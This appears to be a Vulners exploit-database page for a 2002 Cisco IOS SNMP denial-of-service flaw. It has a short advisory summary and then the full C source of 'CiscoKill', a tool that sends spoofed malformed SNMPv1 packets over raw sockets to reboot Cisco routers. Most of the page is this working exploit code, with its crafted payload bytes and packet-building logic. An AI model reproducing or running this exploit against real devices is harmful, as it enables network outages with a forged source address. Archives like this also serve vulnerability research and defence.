Vulners
Lucene search
Cisco IOS 11/12 - SNMP Message Denial of Service
// source: https://www.securityfocus.com/bid/4132/info
Cisco products contain multiple vulnerabilities in handling of SNMP requests and traps. A general report for multiple vendors was initially published on February 12 (Bugtraq IDs 4088 and 4089), however more information is now available and a separate Bugtraq ID has been allocated for the Cisco Operating Systems and Appliances vulnerabilities.
It is reportedly possible for a remote attacker to create a denial of service condition by transmitting a malformed SNMP request to a vulnerable Cisco Operating System or Appliance. The affected device may reset, or require a manual reset to regain functionality.
/* This program send a spoofed snmpv1 get request that cause system reboot
on Cisco 2600 routers with IOS version 12.0(10)
Author : [email protected] ... don't be lame use for testing only! ..:) */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
struct in_addr sourceip_addr;
struct in_addr destip_addr;
struct sockaddr_in dest;
struct ip *IP;
struct udphdr *UDP;
int p_number=1,sok,datasize,i=0;
char *packet,*source,*target;
char *packetck;
char *data,c;
char snmpkill[] =
"\x30\x81\xaf\x02\x01\x00\x04\x06\x70\x75\x62\x6c\x69\x63\xa0\x81"
"\xa1\x02\x02\x09\x28\x02\x01\x00\x02\x01\x00\x30\x81\x94\x30\x81"
"\x91\x06\x81\x8c\x4d\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
"\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73\x25\x73"
"\x25\x73\x25\x73\x25\x73\x81\xff\xff\xff\xff\xff\xff\xff\xff\x7f"
"\x05";
struct pseudoudp {
u_long ipsource;
u_long ipdest;
char zero;
char proto;
u_short length;
} *psudp;
in_cksum (unsigned short *ptr, int nbytes)
{
register long sum; /* assumes long == 32 bits */
u_short oddbyte;
register u_short answer; /* assumes u_short == 16 bits */
/*
* Our algorithm is simple, using a 32-bit accumulator (sum),
* we add sequential 16-bit words to it, and at the end, fold back
* all the carry bits from the top 16 bits into the lower 16 bits.
*/
sum = 0;
while (nbytes > 1)
{
sum += *ptr++;
nbytes -= 2;
}
/* mop up an odd byte, if necessary */
if (nbytes == 1)
{
oddbyte = 0; /* make sure top half is zero */
*((u_char *) & oddbyte) = *(u_char *) ptr; /* one byte only */
sum += oddbyte;
}
/*
* Add back carry outs from top 16 bits to low 16 bits.
*/
sum = (sum >> 16) + (sum & 0xffff); /* add high-16 to low-16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* ones-complement, then truncate to 16 bits */
return (answer);
}
void usage (void)
{
printf("Kundera CiscoKill v1.0\n");
printf("Usage: ciscokill [-n number of packets] [-s source ip_addr] -t ip_target \n");
}
int main(int argc,char **argv){
if (argc < 2){
usage();
exit(1);
}
while((c=getopt(argc,argv,"s:t:n:"))!=EOF){
switch(c) {
case 's': source=optarg; break;
case 'n': p_number=atoi(optarg); break;
case 't': target=optarg;
}
}
if ( (sok=socket(AF_INET,SOCK_RAW,IPPROTO_RAW)) < 0)
{
printf("Can't create socket.\n");
exit(EXIT_FAILURE);
}
destip_addr.s_addr=inet_addr(target);
sourceip_addr.s_addr=inet_addr(source);
datasize=sizeof(snmpkill);
packet = ( char * )malloc( 20 + 8 + datasize );
IP = (struct ip *)packet;
memset(packet,0,sizeof(packet));
IP->ip_dst.s_addr = destip_addr.s_addr;
IP->ip_src.s_addr = sourceip_addr.s_addr;
IP->ip_v = 4;
IP->ip_hl = 5;
IP->ip_ttl = 245;
IP->ip_id = htons(666);
IP->ip_p = 17;
IP->ip_len = htons(20 + 8 + datasize);
IP->ip_sum = in_cksum((u_short *)packet,20);
UDP = (struct udphdr *)(packet+20);
UDP->source = htons(666);
UDP->dest = htons(161);
UDP->len = htons(8+datasize);
UDP->check = 0;
packetck = (char *)malloc(8 + datasize + sizeof(struct pseudoudp));
bzero(packetck,8 + datasize + sizeof(struct pseudoudp));
psudp = (struct pseudoudp *) (packetck);
psudp->ipdest = destip_addr.s_addr;
psudp->ipsource = sourceip_addr.s_addr;
psudp->zero = 0;
psudp->proto = 17;
psudp->length = htons(8+datasize);
memcpy(packetck+sizeof(struct pseudoudp),UDP,8+datasize);
memcpy(packetck+sizeof(struct pseudoudp)+8,snmpkill,datasize);
UDP->check = in_cksum((u_short *)packetck,8+datasize+sizeof(struct pseudoudp));
data = (unsigned char *)(packet+20+8);
memcpy(data,snmpkill,datasize);
dest.sin_family=AF_INET;
dest.sin_addr.s_addr=destip_addr.s_addr;
while (i<p_number)
{
if (( sendto(sok,packet,20+8+datasize,0,( struct sockaddr * ) &dest,sizeof(dest)))<0)
{
printf("Error sending packet.\n");
exit(EXIT_FAILURE);
}
i++;
}
printf("%d packets sent.\n",i);
}Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
12 Feb 2002 00:00Current
7.4High risk
Vulners AI Score7.4